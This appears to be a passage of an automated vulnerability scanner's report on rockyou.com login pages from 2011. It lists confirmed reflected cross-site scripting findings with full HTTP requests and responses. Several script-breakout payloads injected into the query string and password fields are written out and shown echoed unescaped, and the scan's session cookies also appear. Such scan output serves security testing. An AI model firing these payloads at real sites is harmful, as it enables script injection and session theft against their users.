5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><optio..
Date: Mon, 18 Apr 2011 22:00:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:00:04 GMT; path=/; domain=.rockyou.com,lastlogin=1303164004; expires=Wed, 27-Jul-2011 22:00:04 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:00:04 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:00:04 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:00:04 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=89889 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9046
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000735)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><optio..
|
- /login/
/login/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| Query Based | QUERYSTRING | '"--></style></script><script>alert(0x000A44)</script> |
Request
GET /login/?'"--></style></script><script>netsparker(0x000A44)</script> HTTP/1.1
Referer: http://www.rockyou.com/login/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164186; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/login/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164186; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:03:07 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=1172 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 261
Connection: close
Content-Type: text/html; charset=UTF-8
<form method='post' id='redirect_form' action='https://www.rockyou.com/login/?'"--></style></script><script>netsparker(0x000A44)</script>'></form><script>
function redir() {
var redirForm = document.getElementById('redirect_form');
if(redirForm != null & redirForm != undefined){
document.getElementById('redirect_form').submit();
}
}
window.onload=redir;
</script>
Date: Mon, 18 Apr 2011 22:03:07 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=1172 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 261
Connection: close
Content-Type: text/html; charset=UTF-8
<form method='post' id='redirect_form' action='https://www.rockyou.com/login/?'"--></style></script><script>netsparker(0x000A44)</script>'></form><script>
function redir() {
var redirForm = document.getElementById('redirect_form');
if(redirForm != null & redirForm != undefined){
document.getElementById('redirect_form').submit();
}
}
window.onload=redir;
</script>
|
- /login/index.php
/login/index.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| Query Based | QUERYSTRING | '"--></style></script><script>alert(0x000A5D)</script> |
Request
GET /login/index.php?'"--></style></script><script>netsparker(0x000A5D)</script> HTTP/1.1
Referer: http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164188; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164188; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:03:09 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=1120 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8
<form method='post' id='redirect_form' action='https://www.rockyou.com/login/index.php?'"--></style></script><script>netsparker(0x000A5D)</script>'></form><script>
function redir() {
var redirForm = document.getElementById('redirect_form');
if(redirForm != null & redirForm != undefined){
document.getElementById('redirect_form').submit();
}
}
window.onload=redir;
</script>
Date: Mon, 18 Apr 2011 22:03:09 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=1120 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8
<form method='post' id='redirect_form' action='https://www.rockyou.com/login/index.php?'"--></style></script><script>netsparker(0x000A5D)</script>'></form><script>
function redir() {
var redirForm = document.getElementById('redirect_form');
if(redirForm != null & redirForm != undefined){
document.getElementById('redirect_form').submit();
}
}
window.onload=redir;
</script>
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| pass | POST | '"--></style></script><script>alert(0x000B9F)</script> |
| user | POST | 3 |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php?birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164242; ctid=3; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B9F)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164242; ctid=3; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B9F)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:04:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:04:02 GMT; path=/; domain=.rockyou.com,lastlogin=1303164243; expires=Wed, 27-Jul-2011 22:04:03 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:04:03 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:04:03 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:04:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=88813 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9125
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : 